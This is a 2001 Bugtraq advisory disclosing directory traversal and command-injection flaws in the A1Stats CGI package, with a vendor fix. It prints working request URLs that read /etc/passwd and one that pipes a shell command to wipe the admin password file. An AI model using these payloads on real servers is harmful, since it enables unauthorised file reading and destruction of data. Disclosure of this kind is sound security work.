Home page logo
/

bugtraq logo Bugtraq mailing list archives

Advisory for A1Stats
From: neme-dhc () HUSHMAIL COM
Date: Mon, 7 May 2001 19:31:12 -0500

 [ Advisory for A1Stats                            ]
 [ A1Stats is made by Drummond Miles               ]
 [ Site: http://www.gadnet.com/a1stats             ]
 [ by nemesystm of the DHC                         ]
 [ (http://dhcorp.cjb.net - neme-dhc () hushmail com) ]
 [ ADV-0114                                        ]

/-|=[explanation]=|-\
A1Stats is a CGI package to track website traffic.
The package has a view files bug and also gives the
possibility to overwrite existing files.

/-|=[who is vulnerable]=|-\
Anyone using a A1Stats that was downloaded before
24/04/01.

/-|=[testing it]=|-\
To test these vulnerabilities, try the following.
www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
These two will give you /etc/passwd.
www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd
This will also give you /etc/passwd but it will
show it in a very mangled manner as the CGI adds
HTML tags to what it thinks is a file it created
itself.

One can also open a file and wreck its contents.
http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|
will empty a1admin.txt. a1admin.txt contains the
password to change settings of the CGI. When this
file is removed, no one can log in anymore.

/-|=[fix]=|-\
Downloading the latest version will solve this
problem.
Free, encrypted, secure Web-based email at www.hushmail.com

  By Date           By Thread  

Current thread:
  • Advisory for A1Stats neme-dhc (May 08)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]